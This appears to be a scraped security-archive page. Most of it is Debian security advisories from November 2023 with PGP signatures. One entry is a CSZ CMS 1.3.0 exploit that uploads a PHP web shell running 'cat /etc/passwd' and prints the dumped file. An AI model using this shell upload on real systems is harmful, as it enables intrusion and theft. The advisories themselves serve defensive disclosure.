Debian Linux Security Advisory 5567-1 - Multiple buffer overflows and memory leak issues have been found in tiff, the Tag Image File Format (TIFF) library and tools, which may cause denial of service when processing a crafted TIFF image.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- - -------------------------------------------------------------------------Debian Security Advisory DSA-5567-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuNovember 27, 2023                     https://www.debian.org/security/faq- - -------------------------------------------------------------------------Package        : tiffCVE ID         : CVE-2023-3576 CVE-2023-40745 CVE-2023-41175Debian Bug     :Brief introductionMultiple buffer overflows and memory leak issues have been found in tiff,the Tag Image File Format (TIFF) library and tools, which may cause denialof service when processing a crafted TIFF image.For the oldstable distribution (bullseye), these problems have been fixedin version 4.2.0-1+deb11u5.For the stable distribution (bookworm), these problems have been fixed inversion 4.5.0-6+deb12u1.We recommend that you upgrade your tiff packages.For the detailed security status of tiff please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tiffFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmVkI0cACgkQO1LKKgqv2VT46QgAvtYySLyFvbEsmMlcHIFWXRtkqO2cxtsb7F0NDN8vl2yATpPN8ZWeEmFxES3DEpRJkAmZ9Of+87a06r4tdFAQlg/uqwMMO4WbdihUlzgnsRLXKUSUqHMFv3Wr9nvckp6OCwztPUb0G+bpAn+dJHqs6iF3q6ukwWcW0cprLQzigUMmxTnvWt4bc4eT1nfWRLWkwVObl488Lq94zawtB3NZoQaNvQDMHxVZ7VPsQvDSrKAT71/TnzFUpXJlUePBCKUmK1Q0a6akxBpoNAr6ujdrWcCPDMNl7+jBJE3AwoMPZptTlIsqKTYTT4qrtd80YDYxVScgc+t2GrO1PgzM12/Mqg==WLU7-----END PGP SIGNATURE-----

Debian Security Advisory 5567-1

Debian Linux Security Advisory 5566-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5566-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 26, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-6212 CVE-2023-6209 CVE-2023-6208 CVE-2023-6207  
                 CVE-2023-6206 CVE-2023-6205 CVE-2023-6204

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:115.5.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:115.5.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmViiyoACgkQEMKTtsN8  
TjaZUhAAmpG5pqXk0eb9Lq/+PjBe6TjmyaZ1NUbrqnaD7Nygcq3CakX7vrLtlfT0  
M8JUiqHBIpAKZr5E/bs62bZDrf3EGzWJdnHkPs/pI9mpqYMPHxKuuJdOxNSnx216  
R5DUTMe945XodklRslY6gUjuPGlYIpmGSQwMSDnwCgGGWbJ2aRwML3wS56dgv/gd  
Uu7tsD7TBa7BoSTdwB5/J2faaGfptCcTTv5mBk4I4+sdUVo0c1Bzuy5oCVrwUpoB  
PtGKH/lRYyUW9S24O4yN26Up4UYbK212gAiiYdcoXCGxCzcmOuxKjPp4e4qxlR6F  
DYndBKM0zRJF+bIaeGQPgEcU0iCwq8GNcYykDeezUPV3OwA10oHVZZyJjHHEPIlT  
5Q6fbwWlFRqnjfmktJHWwlkQNSi/jI7UiGnnrWKNDtiNyRkfhawHPBwRDhZPxk2c  
E9drKQix9kt9ONNNNnJ9cWyrHwLa59VgZQmJ/swFBXZaxpetobNivCa1t0lCpbor  
jEV2RCrWrd1+AEDiXJxOpU9owLCp4RcBHDnDD+rL+s+CAo341HRhLVj0mYBWQcH3  
VtdGUxoKOfqUNZ1pw7uNNixNh3pJT2elJGn3c029nbNYFAGwrmUDoBt3+EKvj387  
s8QcNcCJCbqdyFqs1v3nQDXHe4zzcTohEIkt16dOPWLpfWodqoY=o6QP  
-----END PGP SIGNATURE-----

Debian Security Advisory 5566-1

Debian Linux Security Advisory 5565-1 - Multiple vulnerabilities were discovered in plugins for the GStreamer media framework and its codecs and demuxers, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5565-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 25, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gst-plugins-bad1.0  
CVE ID         : CVE-2023-44429 CVE-2023-44446  
Debian Bug     : 1056101 1056102

Multiple vulnerabilities were discovered in plugins for the GStreamer  
media framework and its codecs and demuxers, which may result in denial  
of service or potentially the execution of arbitrary code if a malformed  
media file is opened.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1.18.4-3+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 1.22.0-4+deb12u3.

We recommend that you upgrade your gst-plugins-bad1.0 packages.

For the detailed security status of gst-plugins-bad1.0 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gst-plugins-bad1.0

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmViCHBfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Sw8Q/+Kc9Lp3Zl/JqOl+KE+OQ1BpRmcEdbIjruR+TVuBRkVfasH4IG3nb82dQn  
26SeXbR5GA8o48knQDAlHMhurRUVNVbdXDLuOs2+SsGKFrVuv1KCQacqJIH/ybhr  
AZplbQPUVViJiQlEGy5j80eOfifnlHPvQZKtbqp1y/GvTIK56Pg4d7HNLjWeq7+G  
4sdxZeAPSqKdGTOh2fzzy6QIL7QX3FZgBl0fr48+0EdQLLqtQ0dQwSkpXibHZnf9  
PmT+/q3R1pk47n+u/OqPXHMN5+7fJZU6vWgkwfvYIUEVHHL6MlDuNLBVmA1gAn0X  
neRngzuduDoiiKBPSbPk4slcFUIlXpA979IcG/YhO9fdSDs+cPn0euZegzLOgb5v  
S+javZtGSkRVAwH1O2wNMF+mGvXDWxu1y+foKylQ/KYr2OQBOGymANsX/jw6pWCA  
V2bunxab0pPUO/o8m8aq6+XkRvht+KWBo884ze9KvZFRxOivYRP+uKxzc26dZzrU  
xyIGnVuW1Q+iZjWojNfNgpX/oG/c7Ch6TtBxZQQqAdddAlQQQi1rieNTUq391dT1  
TQkyLynaeVmpdKMEtapYwcg+WZfD4cl6F+HhKD3zjIvZRr3EOXloIUY04Xh+/VKO  
6nnKs+TOyyLXjrEUPEE51qQ22ni9kT0ZppbvHrsDwAsCAER7yxM=Yk/C  
-----END PGP SIGNATURE-----

Debian Security Advisory 5565-1

Debian Linux Security Advisory 5564-1 - Michael Randrianantenaina reported several vulnerabilities in GIMP, the GNU Image Manipulation Program, which could result in denial of service (application crash) or potentially the execution of arbitrary code if malformed DDS, PSD and PSP files are opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5564-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoNovember 24, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gimpCVE ID         : CVE-2023-44441 CVE-2023-44442 CVE-2023-44443 CVE-2023-44444Debian Bug     : 1055984Michael Randrianantenaina reported several vulnerabilities in GIMP, theGNU Image Manipulation Program, which could result in denial of service(application crash) or potentially the execution of arbitrary code ifmalformed DDS, PSD and PSP files are opened.For the oldstable distribution (bullseye), these problems have been fixedin version 2.10.22-4+deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 2.10.34-1+deb12u1.We recommend that you upgrade your gimp packages.For the detailed security status of gimp please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/gimpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVhJD5fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0R/hxAAlMYQg+W/jKy/+bgIgisVlRM1dSij6pPFqqCh0aMZr9j8AX8CpZvJBCiRmlfPZe6qS88LKt70zX5xoJOFQ5XS/b9HTMFrv2V6l3pe83Hag0sJOic4WbmI258iB6DFb3qVA9PZjQ+a7JsoPBVc80M3o+rkFbdn2e/d+6ApLxq0XGb3iH0JkYIny41F3FLYhFI1iRCbX9Oxhe91MmtM2CvI5/UWjALS9+U3IgnuyfnTLUEkCfMnvTLEiMBBTwt/rD+zhOEFMvQazocoqEDDjmo4aJ4CVC78EJYbfthUH55JVordifVS6u0tQM0wXGPJhQPsDIModp0KoukvUVlj/LLKa2q9xr5IAM7G5IM3vah8yAFAiF5BFEE4nIRtBBlwfPPVJjrnZEd+pb02HaKgD7bdmAC775HtX8ExGmMeg54ckXv3gokUbFIzDXBAKXhWjoNztrrRiWIo08knZCIYPTxe0Ou6XvrYxcD0UufxqXkSsCdYzC+aBIJasfpdXpbUZ6ECwK/A7DmaIj7Ar4ssvQKf0uLGmQDzGZiLpNsgXg4tR04xCBwQIU7ONr5b629hDt0Lo6QCjNsSlWKNdOkiIZ3DIYRGUEq4dL56pa+vz74nhvEYq2pWu5ijCAk7XOZWuw/CkcMpeXp4Y5yZ88eUYdM3bvpCgriqXvpWJA1NxAiw0/sêEb-----END PGP SIGNATURE-----

Debian Security Advisory 5564-1

Debian Linux Security Advisory 5563-1 - Benoit Morgan, Paul Grosen, Thais Moreira Hamasaki, Ke Sun, Alyssa Milburn, Hisham Shafi, Nir Shlomovich, avis Ormandy, Daniel Moghimi, Josh Eads, Salman Qazi, Alexandra Sandulescu, Andy Nguyen, Eduardo Vela, Doug Kwan, and Kostik Shtoyk discovered that some Intel processors mishandle repeated sequences of instructions leading to unexpected behavior, which may result in privilege escalation, information disclosure or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5563-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoNovember 23, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : intel-microcodeCVE ID         : CVE-2023-23583Debian Bug     : 1055962Benoit Morgan, Paul Grosen, Thais Moreira Hamasaki, Ke Sun, AlyssaMilburn, Hisham Shafi, Nir Shlomovich, avis Ormandy, Daniel Moghimi,Josh Eads, Salman Qazi, Alexandra Sandulescu, Andy Nguyen, Eduardo Vela,Doug Kwan, and Kostik Shtoyk discovered that some Intel processorsmishandle repeated sequences of instructions leading to unexpectedbehavior, which may result in privilege escalation, informationdisclosure or denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 3.20231114.1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 3.20231114.1~deb12u1.We recommend that you upgrade your intel-microcode packages.For the detailed security status of intel-microcode please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/intel-microcodeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVfcuFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SRaw/+JwZlE+c2OdKBuLSQCrlASs1iM+iDrbEYKWU/F+RX5HZgB7O5d953MSnC3jIE0+93CY0oW6iwc3ZTaY4cVt7bVC5MmAzkhcVuxLFNqHoBMUtiqIFX4TguWokALnuXQRrs6+DyZ+3C0gcvHtINnEJzlhS8Oqb0xyJQqSlpYiNng7Wa/F8rfLYGWh6ZN+KIYlyVRBfSO+9pMhRFCM29DWdakdgC5KfHNtRENZxpgeGRxCQQuJIs30hIqKc2Zma3AcSDU3hiHYSXTD7GjMxD5MYkV0U3ervXgcsfpmbW0rczOOK49VZHdQC2frYPEYnFGSMwl72adEtdKctocqRSjtnAbCanEY8Ses7ihTB5l9H7u4TXgzJrHnZSiZ0LXd08AJ8m5zglYg9t4UF3qRYgbdRdAvcOpqggAsZVT5UJWVTVP1rAXhyWGXqh39k9/+JAwjJUTVBIkgJMWPWvj9vLeR7fNKNkJPRfi6wRVZ+cWf5Z2/VqHRkjgT4pDImyadFzRFFzy2JLLett0wpF7Elkpb/0RFOmZw0GbBIOM3XU+/OD93TcT0o0i4gU7DHiW/tEOUk7tnGcIAz3/h9yaOVObm36RdiAHZ+Mprk/GpiSLBsfBQueo+gra2vo0qcqpEgA2XiHqT1LQeqcfJ5AXvdBZAL4bxeWx6DteLL6k1OLrvg4qUc=l9kq-----END PGP SIGNATURE-----

Debian Security Advisory 5563-1

Debian Linux Security Advisory 5562-1 - It was discovered that Tor was susceptible to a crash during handshake with a remote relay, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5562-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 22, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : torCVE ID         : not yet availableIt was discovered that Tor was susceptible to a crash during handshakewith a remote relay, resulting in denial of service.For the oldstable distribution (bullseye), support for tor is nowdiscontinued. Please upgrade to the stable release (bullseye) to continuereceiving tor updates.For the stable distribution (bookworm), this problem has been fixed inversion 0.4.7.16-1.We recommend that you upgrade your tor packages.For the detailed security status of tor please refer toits security tracker page at:https://security-tracker.debian.org/tracker/torFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVeVPMACgkQEMKTtsN8TjbMIA/9EhW1HGw07Hn4iLfT369mukHIEN8TNTS1hGwRKJAf0yZFnqdqdKJ7EsBINIh8LlaHxq09JmMN92oMSvenMMrmpCYCRL2UicPTO59ChueUmIH9gLgr1EqWly2b/A09bfCc3TXA35XDzdFWHuI6k6BV6YVQXfeJP4Xxqg+wrYoXSKq1urhtCIT8+11mmylwKsE0uaIAatMhpLRDPCc4yp0brQTklup+bn7GMpgQbbyuPHazJMYmU7qgRh2u9KPa7XMTt1mpx/b55TRQ2EatVwpHukY131putTfV195i96yD/wECZ9R/ey/maF17EGDq+FtnTus1ePuZmV5eVAZRe1+4wOlUoUggVysJUsor6CYIJ0gTwdozXRzFfR4nkfF+odUBhJAivLvPi9UB0iLo3o3c0l83l0tHRsCVC3TtBo1svo8Q4Ri9p8U1ajmKh8AaNHzGgxwdmot5vbTkyO/Hy4tR7Z3PTWne2OsiL0NcQdQZ1/Cxbcr0h3BFF0fkYtQhG4pMa7luQxQC4GSAVQqKqB4IR4RnSHflCpQcbNm3g9UyYv6G4m6RmVfRuSlaG04TOz3MkLqzdn3iKLsyMbQw2Ojq6CWRUYa4QazjIb6owFjQnarUGKDxlnKtJW2W4IJVCi0Wgt2HwmgCtXjOEqtyhdPhlCGNEViocseong99Mz0Sm6E==H3jh-----END PGP SIGNATURE-----

Debian Security Advisory 5562-1

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

**CSZ CMS 1.3.0 Shell Upload**

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

**CSZ CMS 1.3.0 Shell Upload**

    # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

**File Tags**

*   ActiveX (932)
*   Advisory (83,267)
*   Arbitrary (16,401)
*   BBS (2,859)
*   Bypass (1,803)
*   CGI (1,029)
*   Code Execution (7,417)
*   Conference (682)
*   Cracker (843)
*   CSRF (3,353)
*   DoS (23,990)
*   Encryption (2,372)
*   Exploit (52,241)
*   File Inclusion (4,233)
*   File Upload (977)
*   Firewall (822)
*   Info Disclosure (2,807)
*   Intrusion Detection (900)
*   Java (3,091)
*   JavaScript (879)
*   Kernel (6,834)
*   Local (14,569)
*   Magazine (586)
*   Overflow (12,849)
*   Perl (1,426)
*   PHP (5,162)
*   Proof of Concept (2,349)
*   Protocol (3,652)
*   Python (1,566)
*   Remote (31,026)
*   Root (3,605)
*   Rootkit (515)
*   Ruby (614)
*   Scanner (1,645)
*   Security Tool (7,926)
*   Shell (3,209)
*   Shellcode (1,216)
*   Sniffer (897)
*   Spoof (2,229)
*   SQL Injection (16,436)
*   TCP (2,419)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,079)
*   Web (9,786)
*   Whitepaper (3,757)
*   x86 (966)
*   XSS (18,042)
*   Other

**File Archives**

*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   Older

**Systems**

*   AIX (429)
*   Apple (2,037)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,907)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,375)
*   HPUX (880)
*   iOS (363)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (47,744)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (14,557)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,110)
*   UNIX (9,338)
*   UnixWare (187)
*   Windows (6,605)
*   Other

CSZ CMS 1.3.0 Shell Upload

Debian Linux Security Advisory 5560-1 - Florian Picca reported a bug the charon-tkm daemon in strongSwan an IKE/IPsec suite.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- --------------------------------------------------------------------------  
Debian Security Advisory DSA-5560-1                   security@debian.org  
https://www.debian.org/security/                        Yves-Alexis Perez  
November 20, 2023                     https://www.debian.org/security/faq  
- --------------------------------------------------------------------------

Package        : strongswan  
CVE ID         : CVE-2023-41913

Florian Picca reported a bug the charon-tkm daemon in strongSwan an IKE/IPsec  
suite.

The TKM-backed version of the charon IKE daemon (charon-tkm) doesn't  
check the length of received Diffie-Hellman public values before copying  
them to a fixed-size buffer on the stack, causing a buffer overflow that  
could potentially be exploited for remote code execution by sending a  
specially crafted and unauthenticated IKE_SA_INIT message.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 5.9.1-1+deb11u4.

For the stable distribution (bookworm), this problem has been fixed in  
version 5.9.8-5+deb12u1.

We recommend that you upgrade your strongswan packages.

For the detailed security status of strongswan please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/strongswan

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVbyg9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QjhA//dfNonaZKJnldK6N+2CkHz6Z8JUwTGIugk57QdFc3MJcH+tjreZZmB6VJ  
aGJK4726bt6/1hh6N2AnQUy7jSxi/3h6FI2om4jK9QdAx/zyMQOXAmXt4Aexzm75  
Pz7/ldiG7/ZAxIS8ua1GA6GTOFdQllJ5P4HdBunO5VL9m0Jd9qGZkVOVMkTu7l/j  
NyZgQ3RZyiqWbH1iFEvTjw6N/FrSXRr+GeHWsebdx/xNEXhKS7Hjwbw7ROZEXRno  
+ZRDtUrBe+QNpMx7BE+mmOF3eIZtmlgxHlR4AKtVITKAuEdkQqxminhaaZse9nOX  
u8sju25jJ82WUItkdNSCVqeAjlT/+ru2NoE3ZFpRs6LpRxalvMmXA6R5Eh4agoOG  
OpAWFt8yq0q8Ba347zm+1WCNOr30ZJRLJ8IcOlyShOJv2v5wqMg2VedwgEXOPftZ  
5+vSDN+gHYr5KWS7KFxDx57Tsl6PORdla4rNie3CpEVr4aQnVnKp2mJsuPn6Ax3g  
Sxbh4YDGXBLA5tgKrM0kJsaFPFLk2h4UtA8nLg91HoaxIFsDyO1kdR6uIVBNpJed  
CsYSe9F++jqSlZl4XMKXuxDTjtNoXLm9OTsvkezhN2vTWtLYeHVY5++ckL6guSpK  
dC9Sd7F+SIp3O+XYilsggqMaBJCKUA8l2LJtuWls5skMUvAN4C8=  
=xq5Y  
-----END PGP SIGNATURE-----

Debian Security Advisory 5560-1

Debian Linux Security Advisory 5559-1 - A vulnerability was discovered in the SSH dissector of Wireshark, a network protocol analyzer, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5559-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 19, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : wiresharkCVE ID         : CVE-2023-6174 CVE-2023-6175A vulnerability was discovered in the SSH dissector of Wireshark, anetwork protocol analyzer, which could result in denial of service orpotentially the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 4.0.11-1~deb12u1.We recommend that you upgrade your wireshark packages.For the detailed security status of wireshark please refer toits security tracker page at:https://security-tracker.debian.org/tracker/wiresharkFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVaYm8ACgkQEMKTtsN8Tjbp5A//TSNrnxYrdW4XklOocknIwdtDtzt3AcXA6MLRlWmXnR9I3JWAnfWG84ezlXM/p3kLRN2bzfYVqhL2MpCNQzDyrTpx+0GWSImkPy520WlIrC64GHOqffIffDeF+28bQfdhbI13Kcfc9F7/PLIA9VvzqoFPHlCVdJhxvaCCJHBN2HefNC4fnEKlpU+ZI/68nzvzZsJG5K3tcdUp9BDYr8eRqmfWwuIteTBqfZ13ohvU8lYK6TNZah+NiGoSUmLGtf/5QMXeytiIVDkul5+b206ckvotm2EZQXtZntjZijPbLI1Fh8rPAuVDEbmBQOwYYc7OKlNDKl3GM2bnMXbJaNDBJ2YJk2hO5OfTankrnY54LX7R3D0WBhsDRb7X4tx9shgWOm23aigUj0ebR5jVmaDMYAOMEr5U9juPa8LBRu9gQWRbuuwADTcjsGQiYhjqKoGrCErSInuQUyNSgmyBQgeA4uQipSLpQozt42u2CfBJb5te+sI/USF9xK6xusF5BZK+5leinGLQyDd/wMn8gx/UzbDcvjuT3XMek+1fJjVfzLehorwt+Ck4yXc9edKRFS86ZRVSchFVmZUFREGszNQAwWUbtlXfeLBIF8yNqp7E9qTMyjBpCplk/Vnb3va6wJhMCYTUAgBYVjQ2P6tCPyQJHB8HrXgexcBluGBuu1q2b4M==sLQ/-----END PGP SIGNATURE-----

Debian Security Advisory 5559-1

Debian Linux Security Advisory 5558-1 - Two security vulnerabilities have been discovered in Netty, a Java NIO client/server socket framework.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5558-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
November 18, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : netty  
CVE ID         : CVE-2023-34462 CVE-2023-44487  
Debian Bug     : 1038947 1054234

Two security vulnerabilities have been discovered in Netty, a Java NIO  
client/server socket framework.

CVE-2023-34462

    It might be possible for a remote peer to send a client hello packet during  
    a TLS handshake which lead the server to buffer up to 16 MB of data per  
    connection. This could lead to a OutOfMemoryError and so result in a denial  
    of service.

CVE-2023-44487

    The HTTP/2 protocol allowed a denial of service (server resource  
    consumption) because request cancellation can reset many streams quickly.  
    This problem is also known as Rapid Reset Attack.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:4.1.48-4+deb11u2.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:4.1.48-7+deb12u1.

We recommend that you upgrade your netty packages.

For the detailed security status of netty please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/netty

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmVY5TZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRHiBAAzFhW85Ho37J02wrSDVwhIMTsVjNO9lnA08Pswdohr9K1wxeCJ/hBAx97  
UNIrjTxyOfCJWi1Kj5pITXEHBRu6w1fj/5y9yoMpAKEu+oGQroHbSf4CPmqP2Of0  
eamkfbGx2Dh7Ug3qYxe+elcqRtU3gu8I8DYcWJnm2VpWq7/pbNJ+9iqtmMjhkPLH  
1etLI/5HAkwpPimZSrHzcimn39gEVaIbZLc86ZBAoAPghc+iJR1JFHERmkEutWkB  
eAnL3kD1mr6F711eZvDfPaRfEUVorW67ZEpPX68MJExuYHNXd268EhQOhf/ZYv8g  
SUSBJuKw4w2OnL4fn8lhqnQgYHUVkcYBtfYii6E9bEVAIPoaT+4gvdSg9zkF6cza  
Da8SXkEY2ysaX+A24iVnCNMpCMSOUOxWsFFvkCcfi8A4HxGGqWzVOsBbDJKjktS1  
